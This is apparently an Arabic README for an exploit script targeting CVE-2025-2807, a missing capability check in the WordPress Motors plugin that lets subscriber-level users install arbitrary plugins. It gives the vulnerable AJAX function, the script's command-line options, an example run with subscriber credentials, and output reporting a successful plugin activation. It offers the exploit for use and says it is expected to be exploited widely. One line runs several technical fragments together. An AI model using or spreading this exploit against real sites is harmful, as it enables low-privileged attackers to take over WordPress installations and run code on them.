
ووردبريس - Motors Plugin <= 1.4.64 - ثغرة تثبيت إضافات عشوائية
تم الاستغلال بواسطة: Nxploited | Khaled Alenazi
الإضافة: Motors (<= 1.4.64)
النوع: نقص الترخيص للمستخدمين المصادق عليهم (مشترك+) لتثبيت إضافات تعسفية
الخطورة: 8.8 (CVSS v3)
تم الاكتشاف في: 07 أبريل 2025
VDP: لا
تسمح هذه الثغرة لأي مستخدم WordPress مصادق عليه (مشترك+) بتثبيت إضافات تعسفية بدون أي فحص ترخيص مناسب.
بسبب عدم التحقق من الصلاحيات في دالة mvl_setup_wizard_install_plugin، يمكن لمستخدم ذو صلاحيات منخفضة تنفيذ إجراءات محجوزة للمسؤولين.
📅 من المتوقع استغلالها على نطاق واسع بسبب بساطتها وتأثيرها الحرج.
/wp-admin/admin-ajax.phpmvl_setup_wizard_install_plugincurrent_user_can('install_plugins') أو فحص صلاحية مماثليقوم هذا السكربت بـ:
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]
Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Subscriber username
-p, --password PASSWORD Subscriber password
-pn, --plugin PLUGIN Plugin to install (default: contact-form-7)
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}